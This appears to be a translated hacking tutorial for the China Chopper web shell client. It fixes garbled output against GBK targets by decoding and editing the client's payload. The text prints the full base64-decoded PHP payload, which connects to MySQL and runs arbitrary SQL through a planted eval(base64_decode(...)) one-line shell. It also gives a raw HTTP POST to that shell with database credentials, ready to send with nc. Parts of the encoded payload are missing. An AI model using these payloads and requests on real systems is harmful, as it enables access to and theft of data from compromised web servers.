When the target uses GBK or another charset other than GB2312, the results come back garbled once you connect through a one-line shell with the China Chopper (菜刀, "kitchen knife") client, and changing the encoding setting in the client does not help: the charset is fixed inside the payload the client sends, so the request itself has to be edited and resubmitted.
1. Capture the request and base64-decode it: the z0 POST variable decodes to the following statement (shown here with + and / restored from their %2b and %2f escapes):
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;                                  // start marker the client looks for
$m=get_magic_quotes_gpc();
$hst=$m?stripslashes($_POST["z1"]):$_POST["z1"];   // z1..z4: host, user, password, database
$usr=$m?stripslashes($_POST["z2"]):$_POST["z2"];
$pwd=$m?stripslashes($_POST["z3"]):$_POST["z3"];
$dbn=$m?stripslashes($_POST["z4"]):$_POST["z4"];
$sql=base64_decode($_POST["z5"]);                 // z5: the SQL statement, base64-encoded
$T=@mysql_connect($hst,$usr,$pwd);
@mysql_select_db($dbn);
@mysql_query("set names gbk");                     // charset is hardcoded here
$q=@mysql_query($sql);
$i=0;
while($col=@mysql_field_name($q,$i)){echo($col."|");$i++;}   // header row, fields separated by |
echo("");                                          // row separator
while($rs=@mysql_fetch_row($q)){for($c=0;$c<$i;$c++){echo(trim($rs[$c]));echo("|");}echo("");}
@mysql_close($T);;
echo("|<-");                                       // end marker
die();
2. After re-encoding (note that + has been replaced with %2b and / with %2f):
[...]21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2f[...]c3FsX2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7
([...] marks parts of the encoded string that did not survive in this copy of the page.)
3. If the China Chopper client cannot be used, submit the POST with your own tool, for example plain nc:
POST /fckeditor/xxx.php HTTP/1.1
Referer: http://xxx.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (Windows NT 5.1) Firefox/3.0.0.1
Host: xxxxx.com
Content-Length: 1227
Cache-Control: no-cache
Cookie: __utma=[...]; __utmz=70948559.1300526684.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=[...]

fuck9518=@eval(base64_decode($_POST[chr(122).chr(48)]));&z0=[...]21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0%2f[...]c3FsX2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7&z1=localhost&z2=localnewsssB&z3=local_ddd&z4=db_9518&z5=xxxxx
([...] marks values that did not survive in this copy of the page. fuck9518 is the one-line shell's parameter; chr(122).chr(48) spells "z0", so the shell evaluates the base64-decoded z0 payload.)
z5 must be the base64 encoding of the SQL statement to run, escaped the same way as z0 (+ as %2b, / as %2f). After editing the payload, recompute Content-Length so it matches the new body, otherwise the server will wait for more data or truncate the request. Note also that the payload relies on the mysql_* extension and on set_magic_quotes_runtime(), both removed in PHP 7.0, so this capture only works against PHP 5 targets.